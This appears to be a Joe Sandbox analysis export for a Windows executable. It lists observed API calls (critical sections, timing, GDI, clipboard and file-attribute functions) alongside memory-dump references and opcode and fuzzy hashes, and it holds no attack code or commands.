                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                        • Opcode ID: 8535169f944d0783d85488a8bb89f9586f38ba5067d93ebdde6dc43345f3772a
                                                                                                                                                        • Instruction ID: 42192e3c7faa4449eaa7148df56c5331408008ed83f87a65c0d534a8c29348b8
                                                                                                                                                        • Opcode Fuzzy Hash: 8535169f944d0783d85488a8bb89f9586f38ba5067d93ebdde6dc43345f3772a
                                                                                                                                                        • Instruction Fuzzy Hash: EE41B634300B0D5BD7259F319894BBB77A9AF80704F08415EEB6A8B392DB18FC15D768
                                                                                                                                                        APIs
                                                                                                                                                        • timeGetTime.WINMM(?,?,?,?,?,?), ref: 004F274C
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000,?,?,?), ref: 004F277D
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 004F2787
                                                                                                                                                        • timeGetTime.WINMM(?,?), ref: 004F2792
                                                                                                                                                        • timeGetTime.WINMM(?,?,?,?,?), ref: 004F27C6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Timetime$CriticalSection$EnterLeave
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1404962471-0
                                                                                                                                                        • Opcode ID: a89c063fba00ccfe3890218cc2904d983b2cb644380e86a839d779b6257dffc4
                                                                                                                                                        • Instruction ID: 9d8894fa7cd5c1a3a8d1574b016894ebc4e8e1121a62fd2c9071eafdbb47ea2c
                                                                                                                                                        • Opcode Fuzzy Hash: a89c063fba00ccfe3890218cc2904d983b2cb644380e86a839d779b6257dffc4
                                                                                                                                                        • Instruction Fuzzy Hash: B531BC35208B049BC314DF25E9956ABB7F1FFC9720F148A2DE4EA83390DB34A419CB56
                                                                                                                                                        APIs
                                                                                                                                                        • InterlockedCompareExchange.KERNEL32(00000378,00000001,00000000), ref: 00529421
                                                                                                                                                        • Sleep.KERNEL32(00000000,?,08000041,?,?,00529592,?,?), ref: 00529431
                                                                                                                                                        • InterlockedCompareExchange.KERNEL32(00000378,00000001,00000000), ref: 0052943A
                                                                                                                                                        • InterlockedExchange.KERNEL32(00000378,00000000), ref: 0052944F
                                                                                                                                                        • __aulldiv.LIBCMT ref: 0052947B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExchangeInterlocked$Compare$Sleep__aulldiv
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1430435781-0
                                                                                                                                                        • Opcode ID: b59d1b6a3d222f96c2a2779c59a8c3b1568ac668232a9a2a2876ff2baf467b8b
                                                                                                                                                        • Instruction ID: c7c6432b147b16162d76303af8a74e071e756cb34c164aed74e4a8b1f06fd785
                                                                                                                                                        • Opcode Fuzzy Hash: b59d1b6a3d222f96c2a2779c59a8c3b1568ac668232a9a2a2876ff2baf467b8b
                                                                                                                                                        • Instruction Fuzzy Hash: 9C215AB15007409FD7219F2A9844A67FEFCFFA1705F10851FA45A873A1D7B4A904CB64
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,004F5FEB,?,00000000,?,?,00000000,?), ref: 004F5CC0
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F5CCE
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F5CDE
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F5D07
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F5D48
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F5D56
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                        • Opcode ID: 8da342b9338abc9bf1cf0fb8044ab95eed2f33d4d982754cc72795221a6dba27
                                                                                                                                                        • Instruction ID: 3111dceef54b192a201187cebb12310cd19e01e5115420dd7c98ed3fae01612e
                                                                                                                                                        • Opcode Fuzzy Hash: 8da342b9338abc9bf1cf0fb8044ab95eed2f33d4d982754cc72795221a6dba27
                                                                                                                                                        • Instruction Fuzzy Hash: 2921A73520174A4BD710AF66E888BFFB7B8EB60305F00852FEB4643251C779A84ADB64
                                                                                                                                                        APIs
                                                                                                                                                        • CreateSolidBrush.GDI32(?), ref: 004D802E
                                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 004D8044
                                                                                                                                                        • FillRect.USER32(?,?,00000000), ref: 004D8067
                                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 004D8075
                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 004D8078
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Object$Select$BrushCreateDeleteFillRectSolid
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3777265051-0
                                                                                                                                                        • Opcode ID: 3992c7499909c7ac510ee1e8195cc4d617522fd8d389773b43c489c091130502
                                                                                                                                                        • Instruction ID: d8a686452ba02d7e488f009474b8275e6b936404318e954abf19810798465268
                                                                                                                                                        • Opcode Fuzzy Hash: 3992c7499909c7ac510ee1e8195cc4d617522fd8d389773b43c489c091130502
                                                                                                                                                        • Instruction Fuzzy Hash: 76019A752042046FC304DB69ED88C6B7BF8EACD614B000A5DFA8983312E635E806DB71
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,000007D0,?,?,?,004E515B,?,?,00000000,0041D485), ref: 004E468C
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,0041D485), ref: 004E46A2
                                                                                                                                                        • DeleteCriticalSection.KERNEL32(?,000007D0,?,?,?,004E515B,?,?,00000000,0041D485), ref: 004E46D0
                                                                                                                                                        • DeleteCriticalSection.KERNEL32(?,?,004E515B,?,?,00000000,0041D485), ref: 004E46D9
                                                                                                                                                        • DeleteCriticalSection.KERNEL32(?,?,004E515B,?,?,00000000,0041D485), ref: 004E46E6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$Delete$EnterLeave
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3104255891-0
                                                                                                                                                        • Opcode ID: 9344d0e21620c09b28f686a70e2872a698c0d1dfac57927c88a57cb864f4338f
                                                                                                                                                        • Instruction ID: c031ed0988ac34fb64eb35ca7992c3622ed3d26c78e5592643255ae209dbdd49
                                                                                                                                                        • Opcode Fuzzy Hash: 9344d0e21620c09b28f686a70e2872a698c0d1dfac57927c88a57cb864f4338f
                                                                                                                                                        • Instruction Fuzzy Hash: D101D4B750060C5BC2106B35EC81BAF73A8AFC4214F05051EF54F93241DA68B8088BA1
                                                                                                                                                        APIs
                                                                                                                                                        • OpenClipboard.USER32(00000000), ref: 004D9C27
                                                                                                                                                        • GetClipboardData.USER32(00000001), ref: 004D9C3A
                                                                                                                                                        • GetClipboardData.USER32(0000000D), ref: 004D9C42
                                                                                                                                                        • GetClipboardData.USER32(00000000), ref: 004D9C4B
                                                                                                                                                        • CloseClipboard.USER32 ref: 004D9C56
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Clipboard$Data$CloseOpen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 464010812-0
                                                                                                                                                        • Opcode ID: 3896003866d9e196f5e942c735a105be1c3c3aad61074d0ab1b34134e7345e92
                                                                                                                                                        • Instruction ID: 2f18cbc0f6c8a3dbd26954e8439ab7c802a903eab365c315afdcc22c9d276e9e
                                                                                                                                                        • Opcode Fuzzy Hash: 3896003866d9e196f5e942c735a105be1c3c3aad61074d0ab1b34134e7345e92
                                                                                                                                                        • Instruction Fuzzy Hash: 41E09AB230022517EB9026BA6C4CF97A2EC9F54F90F050123F604C6340E6A6CC0457B1
                                                                                                                                                        APIs
                                                                                                                                                        • GetFileAttributesExA.KERNEL32(?,00000000,?,?,?,00000000,00000008,?,00000008,0041D676,?,?,FlashAuthor.cfg,?,?,00000008), ref: 004CFE0F
                                                                                                                                                          • Part of subcall function 004CB0E0: GetVersionExA.KERNEL32 ref: 004CB0FB
                                                                                                                                                        • GetFileAttributesExW.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,00000008,?,00000008,0041D676,?,?,FlashAuthor.cfg,?), ref: 004CFDAF
                                                                                                                                                        • GetFileAttributesExA.KERNEL32(00000000,00000000,?,?,00000000,00000008,?,00000008,0041D676,?,?,FlashAuthor.cfg,?,?,00000008,00000000), ref: 004CFDED
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AttributesFile$Version
                                                                                                                                                        • String ID: \\?\
                                                                                                                                                        • API String ID: 3849939888-4282027825
                                                                                                                                                        • Opcode ID: f361000200f27e6454158b11577cb5cd6586d4ef8c56bbe8a0e4f20a4d525da9
                                                                                                                                                        • Instruction ID: f991edffad243b4bd670aca913d189ed867c40d808b57564552852d0b3f79ee3
                                                                                                                                                        • Opcode Fuzzy Hash: f361000200f27e6454158b11577cb5cd6586d4ef8c56bbe8a0e4f20a4d525da9
                                                                                                                                                        • Instruction Fuzzy Hash: 6431277A90031067D710AA65AC42FEB73995F85704F54042FF90687352EB6D9C0EC2EA
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000,00000000), ref: 004FA67B
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004FA749
                                                                                                                                                          • Part of subcall function 004F9B30: EnterCriticalSection.KERNEL32(?,00000000,?,004FA7A6,?,?,00153804), ref: 004F9B35
                                                                                                                                                          • Part of subcall function 004F9B30: LeaveCriticalSection.KERNEL32(?), ref: 004F9B84
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000100,00000000,00000000,?), ref: 004FA715
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                                                                                                                                        • String ID: FriendlyName
                                                                                                                                                        • API String ID: 904232820-3623505368
                                                                                                                                                        • Opcode ID: 959ce2fe4b047605d4d04147b9c19dc8780e3383a8dda147e2258153261544ba
                                                                                                                                                        • Instruction ID: 4f25218f4a75fa1caa45750efdb6ff353ea89136e06b91a5ad3ed6f7a0914714
                                                                                                                                                        • Opcode Fuzzy Hash: 959ce2fe4b047605d4d04147b9c19dc8780e3383a8dda147e2258153261544ba
                                                                                                                                                        • Instruction Fuzzy Hash: 9A212A75244301AFD220EB54DC49F5BB7F8BF88714F008A1DFA899B290D774F8098BA6
                                                                                                                                                        APIs
                                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 004CADB4
                                                                                                                                                        • CreateDIBSection.GDI32(00000000,?,00000000,?,00000000,00000000), ref: 004CADC8
                                                                                                                                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 004CADD8
                                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 004CADFF
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Create$CompatibleDeleteObjectSection
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3137390749-0
                                                                                                                                                        • Opcode ID: a74e2540195e9566e7a2ac5dffe2e2de3f45b10f51a9d4c1ea3247f6bedff2c4
                                                                                                                                                        • Instruction ID: ec125f8efd539a004f5243cd975522e641b23088832de904e1665531ca55df12
                                                                                                                                                        • Opcode Fuzzy Hash: a74e2540195e9566e7a2ac5dffe2e2de3f45b10f51a9d4c1ea3247f6bedff2c4
                                                                                                                                                        • Instruction Fuzzy Hash: 2981AFB56043458FC324CF29D484A67FBF1BF98314F148A6ED58A87712D334E989CBA6
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000003.2123313001.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_3_770000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AdjustPointer
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1740715915-0
                                                                                                                                                        • Opcode ID: e93d7e5d452ce734d2e2462fa7bb03522d0fd6ff82d28459489596ce1c95da32
                                                                                                                                                        • Instruction ID: 9eb4f438231cdf1f5a0390a81fae76cf41a7faa79662d3ed8606b3b5fb6622e9
                                                                                                                                                        • Opcode Fuzzy Hash: e93d7e5d452ce734d2e2462fa7bb03522d0fd6ff82d28459489596ce1c95da32
                                                                                                                                                        • Instruction Fuzzy Hash: 14510F72605206EFDF29CF54F985BAAB7A4EF58310F24452DE802872A1E73DEC51CB91
                                                                                                                                                        APIs
                                                                                                                                                        • QueryPerformanceCounter.KERNEL32 ref: 0052AFF0
                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 0052B016
                                                                                                                                                          • Part of subcall function 0040C250: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0040C25F
                                                                                                                                                          • Part of subcall function 0040C250: Sleep.KERNEL32(00000000,?,?,0052B390,?,004012F9,00000008), ref: 0040C272
                                                                                                                                                          • Part of subcall function 0040C250: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0040C279
                                                                                                                                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 0052B050
                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 0052B05B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CounterExchangeInterlockedPerformanceQuery$Compare$Sleep
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 188302963-0
                                                                                                                                                        • Opcode ID: c96cf593c803fdbd1df6e800226bb337d538f109cfd51101e6c499ec62b01222
                                                                                                                                                        • Instruction ID: 331ae7ec3883c6fb41667714d1c2397b805b788a0704fbfdebc2abdcd4384ec1
                                                                                                                                                        • Opcode Fuzzy Hash: c96cf593c803fdbd1df6e800226bb337d538f109cfd51101e6c499ec62b01222
                                                                                                                                                        • Instruction Fuzzy Hash: 19212A75604712ABC318DF65D884A9AF7E8BF89300F040A1DE85993780D734F918CBA2
                                                                                                                                                        APIs
